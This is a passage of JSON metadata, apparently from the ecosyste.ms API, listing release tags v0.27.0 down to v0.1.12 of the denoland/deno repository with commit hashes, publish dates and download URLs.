positories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/